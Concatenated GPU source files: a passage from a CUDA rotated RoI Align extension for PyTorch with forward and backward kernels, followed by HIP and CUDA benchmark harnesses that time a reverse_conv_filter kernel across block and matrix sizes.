1; y = (T) y_low; } else { y_high = y_low + 1; } if (x_low >= width - 1) { x_high = x_low = width - 1; x = (T) x_low; } else { x_high = x_low + 1; } T ly = y - y_low; T lx = x - x_low; T hy = 1. - ly, hx = 1. - lx; // reference in forward // T v1 = bottom_data[y_low * width + x_low]; // T v2 = bottom_data[y_low * width + x_high]; // T v3 = bottom_data[y_high * width + x_low]; // T v4 = bottom_data[y_high * width + x_high]; // T val = (w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4); w1 = hy * hx, w2 = hy * lx, w3 = ly * hx, w4 = ly * lx; return; } template <typename T> __global__ void RRoIAlignForward(const int nthreads, const T* bottom_data, const T spatial_scale, const int channels, const int height, const int width, const int pooled_height, const int pooled_width, const int sampling_ratio, const T* bottom_rois, T* top_data) { CUDA_1D_KERNEL_LOOP(index, nthreads) { // (n, c, ph, pw) is an element in the pooled output int pw = index % pooled_width; int ph = (index / pooled_width) % pooled_height; int c = (index / pooled_width / pooled_height) % channels; int n = index / pooled_width / pooled_height / channels; const T* offset_bottom_rois = bottom_rois + n * 6; // batch_ind, xc, yc, w, h, angle int roi_batch_ind = offset_bottom_rois[0]; // Force malformed ROIs to be 1x1 T roi_width = max(offset_bottom_rois[3] * spatial_scale, (T)1.); T roi_height = max(offset_bottom_rois[4] * spatial_scale, (T)1.); const T* offset_bottom_data = bottom_data + (roi_batch_ind * channels + c) * height * width; // We use roi_bin_grid to sample the grid and mimic integral int roi_bin_grid_h = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_height / pooled_height); // e.g., = 2 int roi_bin_grid_w = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_width / pooled_width); const T mw = 1.0 / roi_bin_grid_w; const T mh = 1.0 / roi_bin_grid_h; // compute pool points T P[8]; compute_roi_pool_pts(offset_bottom_rois, P, spatial_scale, pooled_height, pooled_width, ph, pw); // compute line params T line_params[4]; for (int i = 0; i < 2; ++i) { line_params[i * 2] = P[((i + 1) * 2) % 8] - P[i * 2]; line_params[i * 2 + 1] = P[((i + 1) * 2) % 8 + 1] - P[i * 2 + 1]; } // We do average (integral) pooling inside a bin const T count = roi_bin_grid_h * roi_bin_grid_w; // e.g. = 4 T output_val = 0.; for (int iy = 0; iy < roi_bin_grid_h; iy ++) // e.g., iy = 0, 1 { for (int ix = 0; ix < roi_bin_grid_w; ix ++) { const T x = P[0] + static_cast<T>(iy + 0.5) * line_params[0] * mh + static_cast<T>(ix + 0.5) * line_params[2] * mw; const T y = P[1] + static_cast<T>(iy + 0.5) * line_params[1] * mh + static_cast<T>(ix + 0.5) * line_params[3] * mw; T val = bilinear_interpolate(offset_bottom_data, height, width, y, x, index); output_val += val; // printf("%.2f\n", val); } } output_val /= count; top_data[index] = output_val; } } template <typename T> __global__ void RRoIAlignBackwardFeature(const int nthreads, const T* top_diff, const int num_rois, const T spatial_scale, const int channels, const int height, const int width, const int pooled_height, const int pooled_width, const int sampling_ratio, T* bottom_diff, const T* bottom_rois) { CUDA_1D_KERNEL_LOOP(index, nthreads) { // (n, c, ph, pw) is an element in the pooled output int pw = index % pooled_width; int ph = (index / pooled_width) % pooled_height; int c = (index / pooled_width / pooled_height) % channels; int n = index / pooled_width / pooled_height / channels; const T* offset_bottom_rois = bottom_rois + n * 6; int roi_batch_ind = offset_bottom_rois[0]; // Force malformed ROIs to be 1x1 T roi_width = max(offset_bottom_rois[3] * spatial_scale, (T)1.); T roi_height = max(offset_bottom_rois[4] * spatial_scale, (T)1.); // We use roi_bin_grid to sample the grid and mimic integral int roi_bin_grid_h = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_height / pooled_height); // e.g., = 2 int roi_bin_grid_w = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_width / pooled_width); const T mw = 1.0 / roi_bin_grid_w; const T mh = 1.0 / roi_bin_grid_h; T* offset_bottom_diff = bottom_diff + (roi_batch_ind * channels + c) * height * width; int top_offset = (n * channels + c) * pooled_height * pooled_width; const T* offset_top_diff = top_diff + top_offset; const T top_diff_this_bin = offset_top_diff[ph * pooled_width + pw]; // compute pool points T P[8]; compute_roi_pool_pts(offset_bottom_rois, P, spatial_scale, pooled_height, pooled_width, ph, pw); // compute line params T line_params[4]; for (int i = 0; i < 2; ++i) { line_params[i * 2] = P[((i + 1) * 2) % 8] - P[i * 2]; line_params[i * 2 + 1] = P[((i + 1) * 2) % 8 + 1] - P[i * 2 + 1]; } // We do average (integral) pooling inside a bin const T count = roi_bin_grid_h * roi_bin_grid_w; // e.g. = 4 for (int iy = 0; iy < roi_bin_grid_h; iy ++) // e.g., iy = 0, 1 { for (int ix = 0; ix < roi_bin_grid_w; ix ++) { const T x = P[0] + static_cast<T>(iy + 0.5) * line_params[0] * mh + static_cast<T>(ix + 0.5) * line_params[2] * mw; const T y = P[1] + static_cast<T>(iy + 0.5) * line_params[1] * mh + static_cast<T>(ix + 0.5) * line_params[3] * mw; T w1, w2, w3, w4; int x_low, x_high, y_low, y_high; bilinear_interpolate_gradient(height, width, y, x, w1, w2, w3, w4, x_low, x_high, y_low, y_high, index); T g1 = top_diff_this_bin * w1 / count; T g2 = top_diff_this_bin * w2 / count; T g3 = top_diff_this_bin * w3 / count; T g4 = top_diff_this_bin * w4 / count; if (x_low >= 0 && x_high >= 0 && y_low >= 0 && y_high >= 0) { atomicAdd(offset_bottom_diff + y_low * width + x_low, static_cast<T>(g1)); atomicAdd(offset_bottom_diff + y_low * width + x_high, static_cast<T>(g2)); atomicAdd(offset_bottom_diff + y_high * width + x_low, static_cast<T>(g3)); atomicAdd(offset_bottom_diff + y_high * width + x_high, static_cast<T>(g4)); } // if } // ix } // iy } // CUDA_1D_KERNEL_LOOP } // RoIAlignBackward at::Tensor RROIAlign_forward_cuda(const at::Tensor& input, const at::Tensor& rois, const float spatial_scale, const int pooled_height, const int pooled_width, const int sampling_ratio) { AT_ASSERTM(input.type().is_cuda(), "input must be a CUDA tensor"); AT_ASSERTM(rois.type().is_cuda(), "rois must be a CUDA tensor"); auto num_rois = rois.size(0); auto channels = input.size(1); auto height = input.size(2); auto width = input.size(3); auto output = at::empty({num_rois, channels, pooled_height, pooled_width}, input.options()); auto output_size = num_rois * pooled_height * pooled_width * channels; // auto argmax = at::zeros({num_rois, channels, pooled_height, pooled_width}, input.options().dtype(at::kInt)); cudaStream_t stream = at::cuda::getCurrentCUDAStream(); dim3 grid(std::min(THCCeilDiv((long)output_size, 512L), 4096L)); dim3 block(512); if (output.numel() == 0) { THCudaCheck(cudaGetLastError()); return output; } AT_DISPATCH_FLOATING_TYPES(input.type(), "RROIAlign_forward", [&] { RRoIAlignForward<scalar_t><<<grid, block, 0, stream>>>( output_size, input.contiguous().data<scalar_t>(), spatial_scale, channels, height, width, pooled_height, pooled_width, sampling_ratio, rois.contiguous().data<scalar_t>(), output.data<scalar_t>() ); }); THCudaCheck(cudaGetLastError()); return output; } template <typename T> __device__ void compute_transform_matrix( T* __restrict__ matrix, const T* __restrict__ rois, const float spatial_scale, const int pooled_height, const int pooled_width) { T cx = rois[1] * spatial_scale; T cy = rois[2] * spatial_scale; // Force malformed ROIs to be 1x1 T w = max(rois[3] * spatial_scale, T(1)); T h = max(rois[4] * spatial_scale, T(1)); T angle = deg2rad(rois[5]); // TransformPrepare T dx = -pooled_width / 2.0; T dy = -pooled_height / 2.0; T Sx = w / pooled_width; T Sy = h / pooled_height; T Alpha = cos(angle); T Beta = -sin(angle); T Dx = cx; T Dy = cy; matrix[0] = Alpha*Sx; matrix[1] = Beta*Sy; matrix[2] = Alpha*Sx*dx+Beta*Sy*dy+Dx; matrix[3] = -Beta*Sx; matrix[4] = Alpha*Sy; matrix[5] = -Beta*Sx*dx+Alpha*Sy*dy+Dy; } // local memory version template <typename T> __global__ void compute_roi_pool_pts_local( T* __restrict__ roi_pool_pts, const T* __restrict__ rois, const float spatial_scale, const int roi_pool_pt_num, const int num_rois, const int pooled_height, const int pooled_width) { T matrix[6]; // int idx = blockIdx.x * (blockDim.x * blockDim.y) + threadIdx.x * blockDim.y + threadIdx.y; int idx = blockIdx.x * (pooled_height * pooled_width) + threadIdx.x * pooled_width + threadIdx.y; if (idx >= num_rois * pooled_height * pooled_width) { return; } int pw = threadIdx.y; int ph = threadIdx.x; int n = blockIdx.x; compute_transform_matrix( matrix, rois + n*6, spatial_scale, pooled_height, pooled_width); // ORDER IN CLOCKWISE OR ANTI-CLOCKWISE // (0,1),(0,0),(1,0),(1,1) roi_pool_pts[roi_pool_pt_num * 0 + idx] = matrix[0]*pw + matrix[1]*(ph+1) + matrix[2]; roi_pool_pts[roi_pool_pt_num * 1 + idx] = matrix[3]*pw + matrix[4]*(ph+1) + matrix[5]; roi_pool_pts[roi_pool_pt_num * 2 + idx] = matrix[0]*pw + matrix[1]*ph + matrix[2]; roi_pool_pts[roi_pool_pt_num * 3 + idx] = matrix[3]*pw + matrix[4]*ph + matrix[5]; roi_pool_pts[roi_pool_pt_num * 4 + idx] = matrix[0]*(pw+1) + matrix[1]*ph + matrix[2]; roi_pool_pts[roi_pool_pt_num * 5 + idx] = matrix[3]*(pw+1) + matrix[4]*ph + matrix[5]; roi_pool_pts[roi_pool_pt_num * 6 + idx] = matrix[0]*(pw+1) + matrix[1]*(ph+1) + matrix[2]; roi_pool_pts[roi_pool_pt_num * 7 + idx] = matrix[3]*(pw+1) + matrix[4]*(ph+1) + matrix[5]; } template <typename T> __global__ void bp_rroi_align_backward_kernel( T* __restrict__ bottom_diff, const T* __restrict__ top_diff, const T* __restrict__ roi_pool_pts, const T* __restrict__ rois, const float spatial_scale, const int sampling_ratio, const int num_rois, const int batch_size, const int channels, const int height, const int width, const int pooled_height, const int pooled_width) { __shared__ T roi_pool_pts_shared[8]; __shared__ T line_params[4]; __shared__ T rois_shared[6]; const int roi_pool_pt_num = num_rois * pooled_height * pooled_width; for (int i = blockIdx.x * blockDim.x + threadIdx.x; i < roi_pool_pt_num; i += blockDim.x * gridDim.x) { int c = blockIdx.y * blockDim.y + threadIdx.y; if (c < channels) { int pw = i % pooled_width; int ph = (i / pooled_width) % pooled_height; int n = i / pooled_width / pooled_height; const T* rois_offset = rois + n * 6; // batch_ind, xc, yc, w, h, angle if (threadIdx.y < 6) { rois_shared[threadIdx.y] = rois_offset[threadIdx.y]; } int roi_pool_idx = n * pooled_height * pooled_width + ph * pooled_width + pw; int roi_pool_idx_shared = threadIdx.y; if (roi_pool_idx_shared < 8) { roi_pool_pts_shared[roi_pool_idx_shared] = roi_pool_pts[roi_pool_idx_shared * roi_pool_pt_num + roi_pool_idx]; } __syncthreads(); // compute line params // if (roi_pool_idx_shared < 4) { // line_params[roi_pool_idx_shared] = roi_pool_pts_shared[((roi_pool_idx_shared / 2) + 1) * 2 % 8 + roi_pool_idx_shared % 2] - roi_pool_pts_shared[roi_pool_idx_shared]; // } if (roi_pool_idx_shared < 2) { line_params[roi_pool_idx_shared * 2] = roi_pool_pts_shared[((roi_pool_idx_shared + 1) * 2) % 8] - roi_pool_pts_shared[roi_pool_idx_shared * 2]; line_params[roi_pool_idx_shared * 2 + 1] = roi_pool_pts_shared[((roi_pool_idx_shared + 1) * 2) % 8 + 1] - roi_pool_pts_shared[roi_pool_idx_shared * 2 + 1]; } __syncthreads(); int roi_batch_id = rois_shared[0]; // Force malformed ROIs to be 1x1 T roi_width = max(rois_shared[3] * spatial_scale, (T)1.); T roi_height = max(rois_shared[4] * spatial_scale, (T)1.); // We use roi_bin_grid to sample the grid and mimic integral int roi_bin_grid_h = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_height / pooled_height); // e.g., = 2 int roi_bin_grid_w = (sampling_ratio > 0) ? sampling_ratio : ceil(roi_width / pooled_width); const T mw = 1.0 / roi_bin_grid_w; const T mh = 1.0 / roi_bin_grid_h; int top_data_idx = (n * channels + c) * pooled_width * pooled_height + ph * pooled_width + pw; const T top_diff_this_bin = top_diff[top_data_idx]; // We do average (integral) pooling inside a bin const T count = roi_bin_grid_h * roi_bin_grid_w; for (int iy = 0; iy < roi_bin_grid_h; iy ++) { for (int ix = 0; ix < roi_bin_grid_w; ix ++) { const T x = roi_pool_pts_shared[0] + static_cast<T>(iy + 0.5) * line_params[0] * mh + static_cast<T>(ix + 0.5) * line_params[2] * mw; const T y = roi_pool_pts_shared[1] + static_cast<T>(iy + 0.5) * line_params[1] * mh + static_cast<T>(ix + 0.5) * line_params[3] * mw; T w1, w2, w3, w4; int x_low, x_high, y_low, y_high; bilinear_interpolate_gradient(height, width, y, x, w1, w2, w3, w4, x_low, x_high, y_low, y_high, 0); T g1 = top_diff_this_bin * w1 / count; T g2 = top_diff_this_bin * w2 / count; T g3 = top_diff_this_bin * w3 / count; T g4 = top_diff_this_bin * w4 / count; if (x_low >= 0 && x_high >= 0 && y_low >= 0 && y_high >= 0) { atomicAdd(bottom_diff + ((y_low * width + x_low ) * batch_size + roi_batch_id) * channels + c, static_cast<T>(g1)); atomicAdd(bottom_diff + ((y_low * width + x_high) * batch_size + roi_batch_id) * channels + c, static_cast<T>(g2)); atomicAdd(bottom_diff + ((y_high * width + x_low ) * batch_size + roi_batch_id) * channels + c, static_cast<T>(g3)); atomicAdd(bottom_diff + ((y_high * width + x_high) * batch_size + roi_batch_id) * channels + c, static_cast<T>(g4)); } } } } } } void bp_rroi_align_backward( int batch_size, int num_rois, int channels, int height, int width, int pooled_height, int pooled_width, float spatial_scale, const float* top_diff_d, const float* rois_d, float* bottom_diff_d, cudaStream_t stream ) { unique_ptr_device<float> roi_pool_pts_d(nullptr); int roi_pool_pt_num = num_rois * pooled_height * pooled_width; CUDA_CHECK(cudaMalloc((void **) &roi_pool_pts_d, 8 * roi_pool_pt_num * sizeof(float))); unique_ptr_device<float> bottom_diff_coalesced_d(nullptr); auto bottom_data_size = batch_size * channels * height * width; CUDA_CHECK(cudaMalloc((void **) &bottom_diff_coalesced_d, bottom_data_size * sizeof(float))); { int block_x = TILE_DIM; int block_y = TILE_DIM; const int num_columns = height * width; const int num_rows = batch_size * channels; int grid_x = static_cast<int>(std::ceil(num_columns * 1.0 / block_x)); int grid_y = static_cast<int>(std::ceil(num_rows * 1.0 / block_y)); dim3 block(block_x, block_y); dim3 grid(grid_x, grid_y); matrix_transpose<float><<<grid, block, 0, stream>>>( bottom_diff_coalesced_d.get(), bottom_diff_d, num_columns, num_rows ); } { dim3 block(pooled_height, pooled_width); dim3 grid(num_rois); compute_roi_pool_pts_local<float><<<grid, block, 0, stream>>>( roi_pool_pts_d.get(), rois_d, spatial_scale, roi_pool_pt_num, num_rois, pooled_height, pooled_width); } CUDA_CHECK(cudaDeviceSynchronize()); { // cudaDeviceProp deviceProperties; // int gpu_id = 0; // CUDA_CHECK(cudaGetDeviceProperties(&deviceProperties, gpu_id)); int max_thread_num = 256; // int thread_num_x = std::min(max_thread_num / 8, pooled_width); // int thread_num_y = std::min(max_thread_num / thread_num_x, channels); int thread_num_y = std::min(channels, max_thread_num); // int thread_num_x = max_thread_num / thread_num_y; int thread_num_x = 1; // int block_num_x = std::min(static_cast<int>(std::ceil(pooled_width * pooled_height * num_rois * 1.0 / thread_num_x)), deviceProperties.maxGridSize[0]); int block_num_x = std::min(static_cast<int>(std::ceil(pooled_width * pooled_height * num_rois * 1.0 / thread_num_x)), 65535); int block_num_y = static_cast<int>(std::ceil(channels * 1.0 / thread_num_y)); dim3 block(thread_num_x, thread_num_y); dim3 grid(block_num_x, block_num_y); int sampling_ratio = 0; // default bp_rroi_align_backward_kernel<float><<<grid, block, 0, stream>>>( bottom_diff_coalesced_d.get(), top_diff_d, roi_pool_pts_d.get(), rois_d, spatial_scale, sampling_ratio, num_rois, batch_size, channels, height, width, pooled_height, pooled_width); } CUDA_CHECK(cudaDeviceSynchronize()); { int block_x = TILE_DIM; int block_y = TILE_DIM; const int num_columns = batch_size * channels; const int num_rows = height * width; int grid_x = static_cast<int>(std::ceil(num_columns * 1.0 / block_x)); int grid_y = static_cast<int>(std::ceil(num_rows * 1.0 / block_y)); dim3 block(block_x, block_y); dim3 grid(grid_x, grid_y); matrix_transpose<float><<<grid, block, 0, stream>>>( bottom_diff_d, bottom_diff_coalesced_d.get(), num_columns, num_rows ); } } at::Tensor RROIAlign_backward_cuda(const at::Tensor& grad, const at::Tensor& rois, const float spatial_scale, const int pooled_height, const int pooled_width, const int batch_size, const int channels, const int height, const int width, const int sampling_ratio) { AT_ASSERTM(grad.type().is_cuda(), "grad must be a CUDA tensor"); AT_ASSERTM(rois.type().is_cuda(), "rois must be a CUDA tensor"); auto num_rois = rois.size(0); auto grad_input = at::zeros({batch_size, channels, height, width}, grad.options()); cudaStream_t stream = at::cuda::getCurrentCUDAStream(); dim3 grid(std::min(THCCeilDiv((long)grad.numel(), 512L), 4096L)); dim3 block(512); // handle possibly empty gradients if (grad.numel() == 0) { THCudaCheck(cudaGetLastError()); return grad_input; } AT_DISPATCH_FLOATING_TYPES(grad.type(), "RROIAlign_backward", [&] { // bp_rroi_align_backward( // batch_size, // num_rois, // channels, // height, // width, // pooled_height, // pooled_width, // spatial_scale, // grad.contiguous().data<float>(), // rois.contiguous().data<float>(), // grad_input.data<float>(), // stream); RRoIAlignBackwardFeature<scalar_t><<<grid, block, 0, stream>>>( grad.numel(), grad.contiguous().data<scalar_t>(), num_rois, spatial_scale, channels, height, width, pooled_height, pooled_width, sampling_ratio, grad_input.data<scalar_t>(), rois.contiguous().data<scalar_t>()); }); THCudaCheck(cudaGetLastError()); return grad_input; }
2c1a43ae6e7b7b4cfbf7e6558362a85e29717ae3.hip
// !!! This is a file automatically generated by hipify!!! #include <stdbool.h> #include <stdio.h> #include <string.h> #include <getopt.h> #include <hiprand/hiprand_kernel.h> #include <stdlib.h> #include <hip/hip_runtime.h> #include <sys/time.h> #include "reverse_conv_filter.cu" #include<chrono> #include<iostream> using namespace std; using namespace std::chrono; int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}}; int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}}; int main(int argc, char **argv) { hipSetDevice(0); char* p;int matrix_len=strtol(argv[1], &p, 10); for(int matrix_looper=0;matrix_looper<matrix_len;matrix_looper++){ for(int block_looper=0;block_looper<20;block_looper++){ int XSIZE=matrices_[matrix_looper][0],YSIZE=matrices_[matrix_looper][1],BLOCKX=blocks_[block_looper][0],BLOCKY=blocks_[block_looper][1]; const float *x = NULL; hipMalloc(&x, XSIZE*YSIZE); float beta = 2; float *y = NULL; hipMalloc(&y, XSIZE*YSIZE); unsigned int filter_len = 1; unsigned int len = 1; int iXSIZE= XSIZE; int iYSIZE= YSIZE; while(iXSIZE%BLOCKX!=0) { iXSIZE++; } while(iYSIZE%BLOCKY!=0) { iYSIZE++; } dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY); dim3 threadBlock(BLOCKX, BLOCKY); hipFree(0);hipLaunchKernelGGL(( reverse_conv_filter), dim3(gridBlock),dim3(threadBlock), 0, 0, x,beta,y,filter_len,len); hipDeviceSynchronize(); for (int loop_counter = 0; loop_counter < 10; ++loop_counter) {hipLaunchKernelGGL(( reverse_conv_filter), dim3(gridBlock),dim3(threadBlock), 0, 0, x,beta,y,filter_len,len); } auto start = steady_clock::now(); for (int loop_counter = 0; loop_counter < 1000; loop_counter++) {hipLaunchKernelGGL(( reverse_conv_filter), dim3(gridBlock),dim3(threadBlock), 0, 0, x,beta,y,filter_len,len); } auto end = steady_clock::now(); auto usecs = duration_cast<duration<float, microseconds::period> >(end - start); cout <<'['<<usecs.count()<<','<<'('<<BLOCKX<<','<<BLOCKY<<')' << ','<<'('<<XSIZE<<','<<YSIZE<<')'<<']' << endl; } }}
2c1a43ae6e7b7b4cfbf7e6558362a85e29717ae3.cu
#include <stdbool.h> #include <stdio.h> #include <string.h> #include <getopt.h> #include <curand_kernel.h> #include <stdlib.h> #include <cuda.h> #include <sys/time.h> #include "reverse_conv_filter.cu" #include<chrono> #include<iostream> using namespace std; using namespace std::chrono; int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}}; int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}}; int main(int argc, char **argv) { cudaSetDevice(0); char* p;int matrix_len=strtol(argv[1], &p, 10); for(int matrix_looper=0;matrix_looper<matrix_len;matrix_looper++){ for(int block_looper=0;block_looper<20;block_looper++){ int XSIZE=matrices_[matrix_looper][0],YSIZE=matrices_[matrix_looper][1],BLOCKX=blocks_[block_looper][0],BLOCKY=blocks_[block_looper][1]; const float *x = NULL; cudaMalloc(&x, XSIZE*YSIZE); float beta = 2; float *y = NULL; cudaMalloc(&y, XSIZE*YSIZE); unsigned int filter_len = 1; unsigned int len = 1; int iXSIZE= XSIZE; int iYSIZE= YSIZE; while(iXSIZE%BLOCKX!=0) { iXSIZE++; } while(iYSIZE%BLOCKY!=0) { iYSIZE++; } dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY); dim3 threadBlock(BLOCKX, BLOCKY); cudaFree(0); reverse_conv_filter<<<gridBlock,threadBlock>>>(x,beta,y,filter_len,len); cudaDeviceSynchronize(); for (int loop_counter = 0; loop_counter < 10; ++loop_counter) { reverse_conv_filter<<<gridBlock,threadBlock>>>(x,beta,y,filter_len,len); } auto start = steady_clock::now(); for (int loop_counter = 0; loop_counter < 1000; loop_counter++) { reverse_conv_filter<<<gridBlock,threadBlock>>>(x,beta,y,filter_len,len); } auto end = steady_clock::now(); auto usecs = duration_cast<duration<float, microseconds::period> >(end - start); cout <<'['<<usecs.count()<<','<<'('<<BLOCKX<<','<<BLOCKY<<')' << ','<<'('<<XSIZE<<','<<YSIZE<<')'<<']' << endl; } }}